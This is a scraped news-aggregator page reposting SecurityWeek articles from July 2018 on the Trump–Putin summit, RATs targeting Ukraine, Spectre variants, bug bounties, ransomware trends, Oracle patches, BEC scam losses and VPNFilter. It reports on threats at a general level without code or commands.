English Articles - Úvod Odborné èlánky Bleskovky Témata List EN CZ Seriály Blogy ÈlánkyCZ
Úvod 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50
Back in Washington, Trump Under Pressure to Reverse Course on Russia
19.7.2018 securityweek BigBrothers
President Donald Trump found himself isolated and under pressure to reverse course Tuesday after publicly challenging the US intelligence conclusion that Russia meddled in the 2016 election during his face-to-face with Vladimir Putin.
At his inaugural summit with the Russian president in Finland, Trump appeared to accept at face value the strongman's denial that Moscow interfered in a bid to undermine the Democrat Hillary Clinton -- a stance that triggered bipartisan outrage at home.
Back in Washington, Trump sounded a defensive note, insisting his meeting with Putin had been "even better" than his one last week with traditional allies NATO -- a testy gathering seen as having badly strained trans-Atlantic ties.
But the US president -- who is expected to speak about the meeting at 2:00 pm (1800 GMT) on Tuesday -- has found precious little support for his decision not to confront Putin, and faced calls even from allies to change tack.
"He has to reverse course immediately and he's gotta get out there as soon as possible before the concrete starts to set on this," former White House communications director Anthony Scaramucci said on CNN.
"Loyalty right now requires you to tell the truth and sit with him and explain to him the optics of the situation, why the optics are bad, the strategy in terms of trying to get along with Vladimir Putin and deploying a strategy of going against the intelligence agency is very bad," Scaramucci said.
Former House speaker and longtime Trump ally Newt Gingrich put it yet more bluntly.
"President Trump must clarify his statements in Helsinki on our intelligence system and Putin," he tweeted as Trump headed home. "It is the most serious mistake of his presidency and must be corrected -- immediately.
Trump's performance at the summit has even come under fire from the hosts at Fox News, usually a reliable defender of the president.
"No negotiation is worth throwing your own people and country under the bus," Fox anchor and Fox & Friends co-host Abby Huntsman -- the daughter of the US ambassador to Russia -- wrote on Twitter.
And former president Barack Obama, who has remained above the political fray since leaving office, appeared to allude to the events of the day before during a rare public appearance Tuesday at which he warned the world had plunged into "strange and uncertain times."
"Strongman politics are ascendant, suddenly, whereby elections and some pretense of democracy are maintained -- the form of it -- but those in power seek to undermine every institution or norm that gives democracy meaning," Obama said in Johannesburg.
- 'Undermine democracy' -
Trump and Putin met for two hours in Helsinki on Monday with only their interpreters present, then held a joint press conference.
Standing alongside the Kremlin boss, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Clinton in 2016.
But, insisting he had won the race fair and square, the Republican said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."
Special Counsel Robert Mueller's investigation into Russian meddling and possible collusion with the Trump campaign has increasingly put pressure on the White House, and the president -- who regards it as an attack on his legitimacy -- has dubbed it a "witch hunt."
But the investigation continues to progress, resulting in the indictment of 12 Russian military intelligence agents on Friday -- timing that was embarrassing in light of the upcoming summit.
While Trump has faced intense criticism over Helsinki, he is not entirely without defenders.
Republican Senator Rand Paul has given a series of interviews supporting Trump's stance towards Putin, and berating his critics as biased.
"I think the president did a good thing by meeting with Putin and I think it's a mistake for people to try to turn this into a partisan escapade," the Kentucky Republican said on CBS.
Paul's efforts drew praise from Trump, who tweeted: "Thank you @RandPaul, you really get it!"
But the bipartisan consensus has been broadly hostile to Trump's stance -- as the top Republican in Congress, House Speaker Paul Ryan made clear once more at a press conference Tuesday on Capitol Hill.
"We stand by our NATO allies and all those countries who are facing Russian aggression," Ryan said. "Vladimir Putin does not share our interests, Vladimir Putin does not share our values."
"We just conducted a yearlong investigation into Russia's interference in our elections. They did interfere in our elections. It's really clear. There should be no doubt about that," he said.
"Russia is trying to undermine democracy itself."
RATs Bite Ukraine in Ongoing Espionage Campaign
19.7.2018 securityweek Virus
An ongoing espionage campaign aimed at Ukraine is leveraging three different remote access Trojans (RATs), ESET security researchers warn.
The attacks apparently started in late 2015, but the first report on them emerged in January 2018. ESET says they have been tracking the campaign since mid-2017, and that the attacks have been mainly focused on Ukrainian government institutions, with a few hundred victims in different organizations.
The actors behind this cyber-espionage campaign have been using multiple stealthy RATs to exfiltrate sensitive documents, namely Quasar RAT, Sobaken RAT, and a custom-made RAT called Vermin.
The attackers, which appear to lack advanced skills and access to zero-day vulnerabilities, are using emails and social engineering to distribute the malware. Some emails carried Word documents attempting to exploit CVE-2017-0199, a vulnerability patched in April 2017.
A dropper is usually used to deliver the final payload (which masquerades as software form Adobe, Intel or Microsoft) to the %APPDATA% folder and to achieve persistence via a scheduled task that executes the malware every 10 minutes. Steganography was also employed to trick content filtering, accordnig to a whitepaper (PDF) published by ESET.
To avoid automated analysis systems and sandboxes, the malware checks if the Russian or Ukrainian keyboard layouts are installed and terminates itself if none is found. It also checks the system’s IP address and the username on the machine. Moreover, it checks if the connection to a randomly generated website name/URL fails, as would be expected on a real system.
An open-source backdoor, Quasar RAT can be freely downloaded from GitHub and has been employed by the actors behind this campaign since at least October 2015. Other groups have been using the malware in their attacks as well, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats.
Sobaken is a heavily modified version of Quasar RAT, with removed functionality to make the executable smaller, but also with several anti-sandbox and other evasion tricks added.
Vermin RAT, on the other hand, is a custom-made backdoor that first emerged in mid-2016 and which continues to be used. Written in .NET, it is protected using ConfuserEx and uses Vitevic Assembly Embedder, free software for embedding required DLLs into the main executable.
The malware includes support for screen capturing, reading directory contents, file upload/download/deletion/renaming, process monitoring and termination, shell execution, run keylogger, folder manipulation, audio capture, and bot update.
Most of the commands are implemented in the main payload, but the RAT also includes support for optional components, such as audio recorder, keylogger, password stealer, and USB file stealer.
“These attackers haven’t received much public attention compared to others who target high-profile organizations in Ukraine. However, they have proved that with clever social engineering tricks, cyber-espionage attacks can succeed even without using sophisticated malware. This underscores the need for training staff in cybersecurity awareness, on top of having a quality security solution in place,” ESET notes.
Siemens Informs Customers of New Meltdown, Spectre Variants
19.7.2018 securityweek Vulnerebility
Siemens recently updated its security bulletin for the Meltdown and Spectre vulnerabilities to inform customers of the latest variants, specifically the ones known as LazyFP and Spectre 1.1.
Several industrial control systems (ICS) vendors published security advisories for the CPU flaws shortly after they were disclosed in early January. Siemens published a bulletin on speculative side-channel vulnerabilities on January 11.
In late May, the company updated its bulletin to include information about Variant 3a and Variant 4, which are also known as Spectre-NG. On Tuesday, Siemens once again updated the security bulletin to describe the variants known as LazyFP, a medium severity Meltdown-like flaw disclosed in mid-June and tracked as CVE-2018-3665, and Spectre 1.1, disclosed earlier this month and tracked as CVE-2017-5753.
LazyFP is related to the floating point unit (FPU), also known as the math coprocessor. Researchers discovered that if certain conditions are met an attacker may be able to access FPU state data, which can contain sensitive information, such as cryptographic keys.
Spectre 1.1, described as a bounds check bypass store (BCBS) issue, was disclosed along with Spectre 1.2. Intel awarded $100,000 to the researchers who identified these variants.
While LazyFP and Spectre 1.1 are related to the original Meltdown and Spectre vulnerabilities, CPU and operating system vendors are not as concerned about their impact.
Register for SecurityWeek’s 2018 ICS Cyber Security Conference
Siemens has advised customers to keep an eye out for software and firmware updates provided for operating systems and processors, but warned that some of these updates “can result in compatibility, performance or stability issues.”
The German industrial giant continues to analyze the impact of these vulnerabilities on its products.
In the case of the original Meltdown and Spectre flaws, they have been found to impact many Siemens products, including SIMATIC, RUGGEDCOM, SIMOTION, SINEMA and SINUMERIK devices. The company has released both software and BIOS updates, along with workarounds and mitigations.
Microsoft Offers $100,000 in New Identity Bug Bounty Program
19.7.2018 securityweek Security
Microsoft on Tuesday announced the launch of a new bug bounty program that offers researchers the opportunity to earn up to $100,000 for discovering serious vulnerabilities in the company’s various identity services.
White hat hackers can earn a monetary reward ranging between $500 and $100,000 if they find flaws that impact Microsoft Identity services, flaws that can be leveraged to hijack Microsoft and Azure Active Directory accounts, vulnerabilities affecting the OpenID or OAuth 2.0 standards, or weaknesses that affect the Microsoft Authenticator applications for iOS and Android.
The list of domains covered by the new bug bounty program includes login.windows.net, login.microsoftonline.com, login.live.com, account.live.com, account.windowsazure.com, account.activedirectory.windowsazure.com, credential.activedirectory.windowsazure.com, portal.office.com and passwordreset.microsoftonline.com.
The top reward can be earned for a high quality submission describing ways to bypass multi-factor authentication, or design vulnerabilities in the authentication standards used by Microsoft. OpenID and OAuth implementation flaws can earn hackers up to $75,000.
The smallest rewards are offered for XSS (up to $10,000), authorization issues ($8,000), and sensitive data exposure ($5,000).
“A high-quality report provides the information necessary for an engineer to quickly reproduce, understand, and fix the issue. This typically includes a concise write up containing any required background information, a description of the bug, and a proof of concept. We recognize that some issues are extremely difficult to reproduce and understand, and this will be considered when adjudicating the quality of a submission,” Microsoft wrote on a page dedicated to its new bug bounty program.
The tech giant currently runs several bug bounty programs that offer hundreds of thousands of dollars for a single vulnerability report. This includes the speculative execution side-channel program, which offers up to $250,000 and which the company launched following the disclosure of Meltdown and Spectre; the Hyper-V program, which also offers up to $250,000; the mitigation bypass bounty, with rewards of up to $100,000 for novel exploitation techniques against Windows protections; and the Bounty for Defense, which offers an additional $100,000 for defenses to the mitigation bypass techniques.
GandCrab: The New King of Ransomware?
19.7.2018 securityweek Ransomware
Cryptominers have plateaued, GandCrab is the new king of ransomware, adware -- surprise! -- is as prolific as ever, and VPNFilter might herald a new genre of sophisticated multi-purpose malware. These are some of the conclusions drawn from the Malwarebytes Cybercrime tactics and techniques report for Q2, 2018.
The details come from an analysis (PDF) of the telemetry obtained from the millions of computers using Malwarebytes software. It confirms what has been seen elsewhere: "Ransomware detections dropped this quarter on both the consumer and business sides by 12 and 35 percent, respectively."
This doesn't mean that ransomware has gone away. GandCrab has been the most prolific, partly down to its use by the Magnitude botnet. A decryptor for GandCrab is available on the NoMoreRansom website; but Malwarebytes warns, "there's always a risk that the latest versions being distributed by various exploit kits have no solution in place."
Other new ransomwares highlighted in the report demonstrate either ends of the sophistication spectrum. Spartacus is simple. Although there is no current decryptor, the report suggests, "Spartacus is the kind of software one expects to find offered on a script kiddie forum. There's no online functionality whatsoever." It adds that it seems likely (because the RSA key is embedded in the ransomware), that the private key is held on the author's server. "Decryption for all victims is possible, should this key ever be leaked."
SamSam resides at the sophisticated end of the spectrum. It has had high profile success at the City of Atlanta and Hancock Health this year. "While SamSam has been around for some time, recent evolutions in the attack vector and methodology have proven novel in their approach and successful for the attackers -- raking in over $1 million this year," comments Malwarebytes. Unlike many other ransomwares, SamSam specifically targets and compromises its victims before encrypting the files.
Many commentators have noted that criminal focus has shifted from ransomware to cryptomining in recent months. Malwarebytes telemetry suggests that cryptomining growth has now flattened. It is already declining in the consumer arena, and the firm expects to see it also decline in business attacks next quarter. It suspects that criminals are not receiving the returns on effort they expected; but warns that growth or decline might depend on whether the value of crypto coins goes up or down. Business detections in Q2 grew by just 5%, while consumer detections fell by 36%.
Adware, always near the top of all malware detections, is on the opposite trajectory. Consumer detections grew by 19% (making it the top consumer threat), while business detections fell by 7% (making it the third most prolific threat).
The fastest growing threat for both consumers and businesses has been the return of the backdoor -- growing by 442% up to number three for consumers, and by 109% up to number four for businesses. Malwarebytes puts much of this growth to a malware spreading campaign it refers to as Backdoor.Vools. Since it uses the worm features that exploit vulnerable SMB protocols, Malwarebytes expects it to hang around for months to come.
However, it warns, "The primary fear of Vools' capabilities is not due to its mining component or even its use of ETERNALBLUE, but the additional threats that this malware can and will install on the system once cryptomining goes out of fashion. Based on plummeting cryptocurrency values over the last few months, that time is going to come sooner than later."
While backdoors became more popular, spyware dropped in popularity -- at least in business detections. In consumer detections it grew by 32%; but in business detections it fell 41%, dropping from the most detected malware to the fifth most detected. "The top spyware for Q2," notes the report, "was the notorious TrickBot, which added functionality to steal cryptocurrency wallets from its victims." However, Malwarebytes suspects that the fall will continue, and spyware may not be in the top ten threats for business in Q3.
The report reserves particular attention for VPNFilter, "malware that reportedly infected over 500,000 small-office and consumer-grade routers and NAS devices." The FBI has said that Russian government-linked Fancy Bear (APT 28) is responsible for the malware; and although the initial infection vector is unknown, an understanding of its capabilities is growing. It is multi-stage malware that eventually has wide-ranging functionality. Stage 2 can download files, restart devices, copy data, execute programs, kill processes, and set proxies and other configuration parameters.
Stage 3, downloaded by stage 2, establishes a Tor client to send stolen data back to the authors. The malware, notes the report, "is not only capable of harvesting usernames and passwords, but can also change webpages and insert artificial data to deceive users while, at the same time, draining accounts in the shadows. VPNFilter could also be used to perform DDoS attacks or as a catalyst to install other software like coin miners."
Malwarebytes believes that the end of Q2 2018 and the beginning of Q3 is "the cusp of another significant change in the cybercrime world." It believes that cryptomining will continue to decline, but that ransomware will stage a comeback. It expects more activity from exploit kits, but they will not regain their earlier importance. It does, however, expect data-stealing threats to increase. Since GDPR will limit the time for companies to retain the personal information of their customers, criminals will resort to stealing it directly from the customer.
But perhaps most importantly Malwarebytes believes that VPNFilter might spawn copycats that will target widely-used devices -- and "a new age of IoT malware, long predicted, may finally come to pass."
Santa Clara, Silicon Valley-based Malwarebytes raised $50 million in a Series B funding round from Fidelity Management and Research Company in January 2016, bringing the total raised by the firm to $80 million.
Oracle Patches Record 334 Vulnerabilities in July 2018
19.7.2018 securityweek Vulnerebility
Oracle Patches Over 200 Remotely Exploitable Vulnerabilities in July 2018 Critical Patch Update
Oracle this week released its July 2018 set of patches to address a total of 334 security vulnerabilities, the largest number of flaws resolved with a Critical Patch Update (CPU) to date. Over 200 of the bugs may be remotely exploitable without authentication.
This month, 23 products from the enterprise security giant were patched, including E-Business Suite, Financial Services Applications, Fusion Middleware, Hospitality Applications, Java SE, MySQL, PeopleSoft Products, Retail Applications, Siebel CRM, and the Sun Systems Products Suite.
More than 50 of the flaws addressed this month had a CVSS 3.0 Base Score of 9.8. Overall, 61 security bugs had a CVSS score of 9.0 or above, according to Oracle’s advisory.
A total of 203 vulnerabilities were patched in business-critical applications, around 65% of which could be exploited remotely without entering credentials, ERPScan, a company that specializes in securing Oracle and SAP applications, points out.
This month, Financial Services Applications received the largest number of fixes, at 56. 21 of these vulnerabilities may be remotely exploitable without authentication.
Fusion Middleware received the second largest number of patches, at 44, with 38 of the addressed issues remotely exploitable without authentication.
Next in line are Retail Applications at 31 fixes (26 flaws being remotely exploitable) and MySQL, also with 31 patches (only 7 bugs remotely exploitable), followed by Hospitality Applications with 24 fixes (7 issues remotely exploitable), Sun Systems Products Suite at 22 patches (10 flaws remotely exploitable), and Enterprise Manager Products Suite with 16 fixes (all remotely exploitable without authentication).
Oracle also addressed vulnerabilities in PeopleSoft Products (15 bugs – 11 remotely exploitable without authentication), E-Business Suite (14 flaws – 13 remotely exploitable), Communications Applications (14 – 10), Virtualization (12 – 2), Construction and Engineering Suite (11 – 6), JD Edwards Products (10 – 9), Java SE (8 – 8), and Supply Chain Products Suite (8 – 6).
“On the surface, the downward trend of Java SE patches would appear to be positive,” Apostolos Giannakidis, Security Architect at Waratek, told SecurityWeek. “However, several actions taken to fix Java SE vulnerabilities in the July CPU are likely to break the functionality of certain applications. Application owners who apply binary patches should be extremely cautious and thoroughly test their applications before putting patches into production.”
"The fix for the most critical Java SE vulnerability in the July CPU - CVE-2018-2938 - removes the vulnerable component (Java DB) from the JDK," Waratek explained in a guidance note sent to SecurityWeek Wednesday. "Users that depend on this component must manually obtain the latest Apache Derby artifacts and rebuild their applications."
The least impacted products include Utilities Applications (4 vulnerabilities – 3 remotely exploitable without authentication), Policy Automation (3 flaws – all remotely exploitable), and Database Server (3 – 1).
All of the vulnerabilities impacting Hyperion (2 bugs), Insurance Applications (2), Global Lifecycle Management (1), iLearning (1), Siebel CRM (1), and Support Tools (1) may be exploited remotely without authentication.
Some of the most important issues addressed this month could be exploited remotely to take over the impacted application: CVE-2017-15095 in Oracle Spatial, CVE-2018-7489 in Global Lifecycle Management OPatchAuto component, CVE-2018-2943 in Fusion Middleware MapViewer, CVE-2018-2894 in WebLogic Server, and CVE-2017-5645 in PeopleSoft Enterprise FIN Install.
In late June, Oracle announced the availability of patches for new variants of the speculative execution attack methods known as Meltdown and Spectre. The company released the first set of mitigations against Spectre and Meltdown as part of the January 2018 CPU.
All Oracle customers are advised to apply the fixes included in Oracle’s Critical Patch Updates without delay, as some of the addressed vulnerabilities are being targeted by malicious actors in live attacks.
“Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches,” the company notes.
Flashpoint Launches Ransomware Response & Readiness Service
19.7.2018 securityweek Ransomware
Threat intelligence and research company Flashpoint on Wednesday announced the launch of a new service designed to help organizations prepare and respond to ransomware and other types of cyber extortion incidents.
The new Threat Response & Readiness Subscription is available immediately, both as an extension to Flashpoint’s other business risk intelligence offerings and a standalone service that can be purchased separately. Pricing is customized based on the customer’s requirements for response and readiness engagements.
The readiness part of the service includes ransomware workshops, tabletop exercises (TTX), and pre-negotiated rates and engagement hours. The workshops are designed to educate the customer’s employees on ransomware, including how it works, how organizations can become infected, attacker profiles, and cryptocurrencies.
The TTX involves discussing simulated scenarios, assessing the effectiveness of current response plans, establishing roles and responsibilities, and improving coordination.
As for incident response, Flashpoint provides research on the threat actor launching the attack, engages with the attacker in an effort to determine appropriate mitigations, and even helps the victim acquire cryptocurrency in case they decide to pay the ransom.
“While law enforcement and the security community generally do not recommend that victims pay ransoms or extortion demands, in some cases it is the most reasonable decision, particularly for organizations concerned with the consequences of impermissible downtime and the inaccessibility of critical systems or data,” Tom Hofmann, VP of Threat intelligence at Flashpoint, told SecurityWeek.
“Determining whether or not to pay a ransom or extortion demand is a highly individual and situational decision. Deciding factors generally include available evidence, information, estimated impact, and perhaps most importantly, the estimated validity of the attacker’s claims—in other words, if a payment is made, will the attacker actually unlock or deliver the data?” Hofmann added.
As part of the response service, Flashpoint directly engages with the attacker on behalf of the customer to verify if the threat is real and if the hackers’ claims are credible, determine if the compromised data may be recovered by other means, identify mitigations, and, if necessary, pay the ransom.
Analyzing the threat also involves investigating the digital wallet accepting the ransom or extortion payment, which can provide insight into the validity of the attacker’s claims.
“In some cases, suspected attackers are actually just automated bots attempting to scam victims into paying and have no intention of encrypting or otherwise compromising the victim’s data. If analysis reveals that a unique wallet has not been configured for each unique infection, it is an indicator that the attacker may be less sophisticated, an automated bot could potentially be involved, and further analysis is likely required,” Hofmann explained.
Flashpoint strongly discourages any individual or organization from engaging directly with the threat actor on their own, due to “the inherent difficulties and security risks involved,” Hofmann said.
Data Privacy Automation Provider Integris Software Raises $10 Million
19.7.2018 securityweek IT
Integris Software, a Seattle-based provider of data privacy automation tools, today announced that it has raised $10 million through a Series A financing round led by Aspect Ventures.
The oversubscribed round brings the total funding raised by the company to $13 million.
The company explains that its flagship data privacy automation platform automates the process of “identifying, classifying and continuously monitoring sensitive data that enables a defensible compliance strategy for enterprises.”
"Global CTOs are realizing that complying with privacy law is essentially a data problem and that without an automated discovery mechanism for sensitive information, they’re flying blind on what data is important to secure and why,” Kristina Bergman, CEO of Integris Software, said in a statement.
The company will help customers comply with emerging and changing data privacy regulations, such as the EU’s General Data Protection Regulation (GDPR) and the upcoming California state law AB375.
Other investors participating in the funding round include Workday Ventures, Madrona Venture Group, and Amplify Partners.
“Integris is a unique vendor that, through automation, can discover data at rest or in motion, structured or unstructured, on premise or in the cloud,” said Mark Peek, managing director and co-head, Workday Ventures. “Companies need to be able to produce evidence that shows what sensitive information has been deleted or rectified.”
NIST to Withdraw 11 Outdated Cybersecurity Publications
19.7.2018 securityweek BigBrothers
The U.S. National Institute of Standards and Technology (NIST) announced on Tuesday that its Computer Security Division has decided to withdraw eleven outdated SP 800 publications.
NIST’s 800 series Special Publications (SP) focus on cybersecurity and include guidelines, technical specifications, recommendations, and annual reports. These publications are meant to address and support the security and privacy needs of government agencies, but they are often used and referenced by private sector companies.
NIST’s website currently lists over 180 SP 800 publications, including drafts and final versions. Eleven of them, which are now considered out of date, will be withdrawn on August 1, 2018, and will not be revised or superseded.
The documents will still be available for historical reference, but their status will be changed from “final” to “withdrawn.”
The following SP 800 publications will be withdrawn, with the reason for withdrawal listed for each document:
● SP 800-13 (October 1995): Telecommunications Security Guidelines for Telecommunications Management Network – describes outdated technologies;
● SP 800-17 (February 1998): Modes of Operation Validation System (MOVS): Requirements and Procedures – validation system is for deprecated algorithms, such as DES and Skipjack;
SP 800-19 (October 1999): Mobile Agent Security – environments and technologies far less complex than what is used today;
SP 800-23 (August 2000): Guidelines to Federal Organizations on Security Assurance and Acquisition/Use of Tested/Evaluated Products – based on outdated laws, regulations and executive directives;
● SP 800-24 (April 2001): PBX Vulnerability Analysis: Finding Holes in Your PBX Before Someone Else Does – does not address newer technologies, such as VOIP;
● SP 800-33 (December 2001): Underlying Technical Models for Information Technology Security – describes a model that pre-dates the Risk Management Framework and Cybersecurity Framework;
● SP 800-36 (October 2003): Guide to Selecting Information Technology Security Products – outdated references and it does not reflect current types of security products;
● SP 800-43 (November 2002): Systems Administration Guidance for Securing Windows 2000 Professional System – Windows 2000 no longer supported;
● SP 800-65 (January 2005): Integrating IT Security into the Capital Planning and Investment Control Process – pre-dates the Cybersecurity Framework and other important SP 800 guidance;
● SP 800-68 Rev. 1 (October 2008): Guide to Securing Microsoft Windows XP Systems for IT Professionals: A NIST Security Configuration Checklist – Windows XP no longer supported;
● SP 800-69 (September 2006): Guidance for Securing Microsoft Windows XP Home Edition: A NIST Security Configuration Checklist – Windows XP no longer supported.
US Lifts Export Ban on Suppliers to China's ZTE
18.7.2018 securityweek BigBrothers
The United States on Friday formally lifted a crippling ban on exports to China's ZTE, rescuing the smartphone maker from the brink of collapse after it was denied key components.
The US Commerce Department said it would continue to monitor the company to prevent further violations of US sanctions on Iran and North Korea.
"While we lifted the ban on ZTE, the Department will remain vigilant as we closely monitor ZTE's actions to ensure compliance with all US laws and regulations," Commerce Secretary Wilbur Ross said in a statement.
But the move to reverse the harsh penalties, made at President Donald Trump's insistence, has left US lawmakers irate. Congress has taken steps to keep the ban in place and accused Trump of rewarding a company which had repeatedly flouted American law, lied to authorities and engaged in espionage.
The about-face to rescue to the company created a stark contrast with the escalating trade war between Washington and Beijing.
The Commerce Department in April banned US companies from supplying ZTE with crucial components, forcing it to halt operations, after officials found further violations even after reaching a settlement in March of last year over the initial complaints.
The company had paid bonuses rather than reprimanding employees involved in illegal activity and created an "elaborate scheme" to deceive US officials and obstruct justice, US officials said.
But as a favor to Chinese President Xi Jinping, Trump ordered Commerce to ease the penalties on ZTE.
In an agreement struck last month, Washington agreed to lift the export ban if ZTE paid an additional $1 billion fine -- beyond the $892 million penalty imposed in 2017.
The company also was required to replace its board of directors, retain outside monitors and put $400 million in escrow to cover any future violations -- a final step it took this week.
In a statement this week, Senator Mark Warner of Virginia, the senior Democrat on the Select Committee on Intelligence, lambasted the reversal, saying the US military and spy agencies had branded ZTE an "ongoing threat" to US national security.
"This sweetheart deal not only ignores these serious issues, it lets ZTE off the hook for evading sanctions against Iran and North Korea with a slap on the wrist," Warner said.
BEC Scam Losses Top $12 Billion: FBI
18.7.2018 securityweek BigBrothers
The losses and potential losses reported as a result of business email compromise (BEC) and email account compromise (EAC) scams exceed $12 billion globally, according to an alert published last week by the FBI.
The report is based on data collected by the FBI’s Internet Crime Complaint Center (IC3), international law enforcement and financial institutions between October 2013 and May 2018. The amounts represent both money that was actually lost by victims and money they could have lost had they taken the bait.
BEC scams, which involve sending requests for fund transfers and personally identifiable information from hijacked business email accounts, have been observed in 50 U.S. states and 150 countries, with money being sent to 115 countries.
The top destinations for money generated by BEC scams are Asian banks in China and Hong Kong, but a significant number of schemes involve financial organizations in the U.K., Mexico and Turkey.
According to the FBI, more than 78,000 complaints have been made globally between October 2013 and May 2018, with over 41,000 victims reported in the United States. Targeted individuals and businesses lost or could have lost $12.5 billion, nearly $3 billion of which in the U.S. Losses increased by 136% between December 2016 and May 2018.
The number of non-U.S. victims known to the FBI is 2,565, with losses totaling over $670 million.
In comparison, the FBI’s previous report on BEC scams, which covered the period between October 2013 and December 2016, said there had been 40,203 incidents globally with exposed losses totaling over $5.3 billion.
In its recent 2017 Internet Crime Report, the FBI said IC3 received over 15,000 BEC and EAC complaints last year, reporting losses of $675 million.
The law enforcement agency highlighted that the real estate sector continues to be increasingly targeted. Victims include law firms, title companies, real estate agents, sellers, and buyers.
In scams targeting this sector, the fraudsters use spoofed emails on behalf of real estate transaction participants and instruct recipients to transfer money into fraudulent accounts.
“Based on victim complaint data, BEC/EAC scams targeting the real estate sector are on the rise,” the FBI said. “From calendar year 2015 to calendar year 2017, there was over an 1100% rise in the number of BEC/EAC victims reporting the real estate transaction angle and an almost 2200% rise in the reported monetary loss. May 2018 reported the highest number of BEC/EAC real estate victims since 2015, and September 2017 reported the highest victim loss.”
The topic of BEC scams and how the threat can be prevented using human-powered intelligence was covered recently in a SecurityWeek column by Josh Lefkowitz, CEO of business risk intelligence firm Flashpoint.
“BEC underscores why even the most technically sophisticated cyber defenses aren’t always a match for low-tech threats. Combating BEC requires more than just advanced technologies and robust perimeter security—it requires humans to understand the threat,” Lefkowitz said.
Dark Web Chatter Helpful in Predicting Real World Hacks, Firm Says
18.7.2018 securityweek CyberCrime
Some hacks are serendipitous events for skiddies who happen across a website with an easily exploitable common vulnerability. Others, especially the major breaches of major enterprises, are planned and executed with care. Such planning often leaves traces of noise across the internet. IntSights, founded in 2015, searches both the surface and deep web for this noise, and converts it into actionable intelligence. It looks for evidence of planned attacks before they actually occur.
Financial services is one sector that is unlikely to fall to skiddie attacks. The bank heists of $4.4 million (NIC Asia Bank, November 2017), $60 million (Far Eastern Bank, October 2017) and $100 million (Post-Soviet Bank, Russia, February 2017) would have needed planning. IntSight is predicated on the idea that such planning may be detectable; and if detected, the attack can be mitigated.
It has found considerable growth in pre-attack indicators, matching the actual growth in real financial services attacks. An analysis (PDF) focuses on two categories of 'attack indicators' found on the internet: company or customer data offered for sale in a black market, and phishing email target lists. Based on this analysis, IntSights finds that financial organizations comprise the single most-attacked industry sector.
In the first six months of 2017, it found an average of 207 attack indicators per U.S. bank. By the first six months of 2018, this had risen to an average of 520 indicators per bank -- an increase of 151%.
These figures come from a similar year-on-year growth of 135% in instances of financial data being sold on dark web black markets. a 91% increase in corporate email addresses found on phishing target lists, a 40% increase in corporate credential leakage, and a 149% increase in stolen bank card information.
Following high-profile takedowns of major deep web marketplaces leading to arrests and prosecutions for the sale of illegal physical goods (such as drugs and guns), IntSights believes that these marketplaces are now concentrating on the sale of data. However, even this is evolving. While the deepest forums remain, criminals are increasingly untrustful of their fellow members -- and are shifting towards business hidden in plain sight on the surface web.
Over the same period, IntSights has seen a 49% growth in the creation of fake social media accounts -- or put another way, two new fake profiles targeting each individual bank per week.
"A fake profile," notes the report, "can lure users to phishing sites or downloading fake apps. It can pose as customer service and ask for confidential information. It can spread false information to misdirect the public, manipulate stock price or influence the public to buy or sell. Additionally, it can also be used to harvest personal data and enrich other personal data that the attacker might hold."
The report also notes that the three dominant hacking groups that attack the financial sector are Money Taker, Carbanak and Cobalt -- all believed to be situate in Russia. Money Taker is thought to be responsible for more than 20 successful attacks against financial institutions in the U.S., UK and Russia. Carbanak has been credited with more than 300 successful attacks on banks, financial institutions and retailers. Cobalt has been credited with the theft of $9.7 million from the Russian MetakkinvestBank; ATM thefts of $2.18 million from Taiwan banks; a SWIFT attack on Russian banks; and more than 200 other attacks on banks in Europe, Thailand, Turkey and Taiwan.
However, financial services aren't merely attacked by criminal gangs -- they also attract the attention of nation-state APT groups like Lazarus (North Korea). Lazarus has been credited with the 2014 attack on Sony Pictures; the WannaCry ransomware attack on multiple organizations around the world; the theft of $12 million from Banco del Austro in Ecuador; the theft of $1 million from Tien Phong Bank in Vietnam -- SWIFT attack; the theft of $81 million from the Central Bank of Bangladesh; the theft of $60 million from FEIB Bank in Taiwan; and the theft of $5 million from various banks in Nepal.
Based on its analysis of the activity it has tracked over the last 18 months, IntSights sees a continuously adapting and evolving financial services threat landscape -- some of which is already evident. Criminals will increasingly attack the supply chain, gaining access to large enterprises via their smaller suppliers. They will also look to compromise third-party software used by larger organizations -- a case in point being the recent Ticketmaster breach via Inbenta software.
IntSights also believes that direct extortion 'will become the new ransomware'. The huge fines that can be levied from new legislation such as the EU's General Data Protection Regulation (GDPR) will far exceed that amount that can be extorted by ransomware or the cost of recovering from ransomware. "Regulation fines and brand reputation damage," warns the report, "can be way more costly than downtime or lost data. Therefore, organizations are willing to pay more to not have a breach disclosed to the public, rather than pay to regain access to their data. Hackers will leverage this fear as a tactic to get more money."
Finally, IntSights notes that black market vendors are moving away from the deep web "to social media platforms (such as Facebook closed groups) and encrypted chat rooms (such as Telegram, ICQ and Jabber). We expect this trend to continue over the next year as it provides black market vendors with better privacy and secrecy."
"We see many financial organizations too focused on stopping direct attacks to their corporate systems," concludes Itay Kozuch, director of threat research at IntSights. "However, our research shows that cybercriminals have begun circumventing these defenses using social media, mobile application stores and phishing schemes.
"These tactics leverage an organization's brand and credibility to trick users and run scams, which can be even more costly and dangerous than direct attacks," he added. "We published our Financial Services Threat Landscape report to help these organizations widen their view of the threat landscape to not just protect against direct attacks, but protect their customers and prevent successful fraud."
Israel-born startup IntSights Cyber Intelligence raised $17 million in a Series C funding round led by Tola Capital in June 2018, bringing the total capital raised by the firm to $41.3 million.
VPNFilter Malware Hits Critical Infrastructure in Ukraine
18.7.2018 securityweek Virus
The Security Service of Ukraine (SBU) revealed this week that the VPNFilter malware, which it attributed to Russian intelligence agencies, had targeted a critical infrastructure organization.
According to the SBU, the malware was detected on the systems of the Aulska chlorine station in Auly, Dnipropetrovsk. The organization is part of the country’s critical infrastructure as it supplies chlorine to water treatment and sewage plants across Ukraine.
The malware reportedly targeted technological processes and safety systems, but the security agency said it quickly detected and blocked the attempt. The SBU said the attack could have resulted in technological process disruptions or a crash of the affected systems, which could have led to a “disaster.” The agency believes the attackers’ goal was to disrupt operations at the facility.
